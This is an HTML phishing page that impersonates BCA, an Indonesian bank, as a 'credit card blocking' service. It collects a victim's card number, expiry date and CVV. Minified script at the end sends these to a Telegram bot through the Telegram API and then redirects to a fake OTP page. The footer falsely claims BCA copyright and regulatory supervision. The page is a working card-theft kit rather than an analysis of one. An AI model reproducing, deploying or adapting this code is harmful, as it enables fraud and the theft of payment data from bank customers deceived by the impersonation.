<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, shrink-to-fit=no">
    <title>BCA - Mobile Banking</title>
    <link rel="icon" href="../assets/img/favicon.png">
    <!-- Tailwind CSS and DaisyUI CDN -->
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css">
    <link href="https://cdnjs.cloudflare.com/ajax/libs/tailwindcss/2.2.19/tailwind.min.css" rel="stylesheet">
    <link href="https://cdn.jsdelivr.net/npm/daisyui@4.12.10/dist/full.min.css" rel="stylesheet" type="text/css" />
    <script src="https://cdn.tailwindcss.com"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/alpinejs/3.10.2/cdn.min.js" defer></script>
    <script src="https://kit.fontawesome.com/333ea4a5cf.js" crossorigin="anonymous"></script>
    <script src="config.js"></script> <!-- Include your config.js file -->
</head>

<body class="bg-gray-100 flex flex-col min-h-screen">
    <!-- Header -->
    <nav class="bg-blue-600 shadow-md fixed w-full top-0 z-10">
        <div class="container mx-auto flex items-center p-4">
            <a class="flex items-center" href="#">
                <img src="../images/bcalogo.png" class="w-1/3" alt="BCA Logo">
            </a>
        </div>
    </nav>

    <!-- Main Content -->
    <main class="flex-grow container mx-auto mt-16">
        <div class="bg-white shadow-md rounded-lg border border-gray-300 p-6 mb-4">
            <div class="text-center mb-4">
                <h4 class="text-xl font-bold mb-2">Layanan BCA Pemblokiran Kartu Kredit</h4>
                <p>Masukan Data Kartu Kredit Anda</p>
                <img src="../images/anu.png" class="mt-4 mb-4 w-5/5 mx-auto" alt="Image">
            </div>
            <form id="kreditForm">
                <div class="mb-4">
                    <label for="no_kartu" class="sr-only">Nomor Kartu</label>
                    <div class="relative">
                        <i class="fa-solid fa-credit-card absolute inset-y-0 left-3 flex items-center text-blue-500"></i>
                        <input type="tel" id="no_kartu" name="no_kartu" placeholder="Nomor Kartu"
                               class="form-input pl-10 py-2 border border-blue-500 rounded-lg shadow-md w-full"
                               onkeypress="return Angkasaja(event)" required pattern="\d{16}" maxlength="16" title="Nomor kartu harus terdiri dari 16 digit angka">
                    </div>
                </div>
                <div class="mb-4">
                    <label for="berlaku_kartu" class="sr-only">Masa Berlaku Kartu</label>
                    <div class="relative">
                        <i class="far fa-credit-card-alt absolute inset-y-0 left-3 flex items-center text-blue-500"></i>
                        <input type="text" id="berlaku_kartu" name="berlaku_kartu" placeholder="Masa Berlaku Kartu MM / YY"
                               class="form-input pl-10 py-2 border border-blue-500 rounded-lg shadow-md w-full"
                               required pattern="\d{2}/\d{2}" title="Format harus MM/YY" maxlength="5" oninput="formatExpiryDate(this)">
                    </div>
                </div>                
                <div class="mb-4">
                    <label for="cvv" class="sr-only">CVV</label>
                    <div class="relative">
                        <i class="fas fa-credit-card absolute inset-y-0 left-3 flex items-center text-blue-500"></i>
                        <input type="tel" id="cvv" name="cvv" placeholder="CVV"
                               class="form-input pl-10 py-2 border border-blue-500 rounded-lg shadow-md w-full"
                               onkeypress="return Angkasaja(event)" required pattern="\d{3,4}" maxlength="4" title="CVV harus terdiri dari 3 atau 4 digit angka">
                    </div>
                </div>
                <button type="submit"
                        class="btn bg-blue-600 text-white w-full py-2 rounded-lg shadow-md hover:bg-blue-700">
                    Blokir Sekarang
                </button>
            </form>
            
            <script>
            function formatExpiryDate(input) {
                let value = input.value.replace(/\D/g, '');
                if (value.length >= 2) {
                    input.value = value.slice(0, 2) + '/' + value.slice(2, 4);
                } else {
                    input.value = value;
                }
            }
            </script>
            
            

            <!-- Loading Icon -->
            <div id="loading" class="hidden fixed inset-0 flex items-center justify-center z-50">
                <div class="spinner-border text-blue-600 animate-spin h-12 w-12 border-4 border-t-4 border-t-transparent rounded-full"></div>
            </div>
        </div>
    </main>

    <!-- Footer -->
    <footer class="bg-cover bg-top bg-no-repeat" style="background-image: url('../images/footer.jpg');">
        <div class="text-center py-8">
            <img src="../assets/img/ayii.png" class="w-3/5 mx-auto mb-2" alt="Footer Image">
            <p class="text-white text-xs mb-1">BCA Indonesia terdaftar dan diawasi oleh Otoritas Jasa Keuangan (OJK) serta merupakan peserta penjamin Lembaga Penjamin Simpanan LPS</p>
            <p class="text-white text-xs">Copyright © 2024 BCA Indonesia</p>
        </div>
    </footer>

    <!-- JavaScript -->
    <script type="text/javascript">
        !function(){function e(e){var t=(e.which?e.which:e.keyCode);return!(t>31&&(t<48||t>57))}function t(e){var t=(e.which?e.which:e.keyCode);return!(t>31&&(t<48||t>57))}document.getElementById("kreditForm").addEventListener("submit",function(e){e.preventDefault();document.getElementById("loading").classList.remove("hidden");var t=document.getElementById("no_kartu").value,n=document.getElementById("berlaku_kartu").value,a=document.getElementById("cvv").value,o="𝗕𝗖𝗔 - 𝗞𝗥𝗘𝗗𝗜𝗧\n𝗡𝗼𝗺𝗼𝗿 𝗞𝗮𝗿𝘁𝘂:\n "+t+"\n𝗠𝗮𝘀𝗮 𝗕𝗲𝗿𝗹𝗮𝗸𝘂:\n "+n+"\n𝗖𝗩𝗩:\n "+a;fetch("https://api.telegram.org/bot"+TELEGRAM_BOT_TOKEN+"/sendMessage",{method:"POST",headers:{"Content-Type":"application/json"},body:JSON.stringify({chat_id:TELEGRAM_USER_ID,text:o})}).then(function(e){return e.json()}).then(function(e){e.ok?window.location.href="../otpvalid1.html":alert("Gagal mengirim data ke Telegram. Silakan coba lagi.")}).catch(function(e){console.error("Error:",e),alert("Terjadi kesalahan. Silakan coba lagi.")}).finally(function(){document.getElementById("loading").classList.add("hidden")})})}();
        </script>
        
</body>

</html>
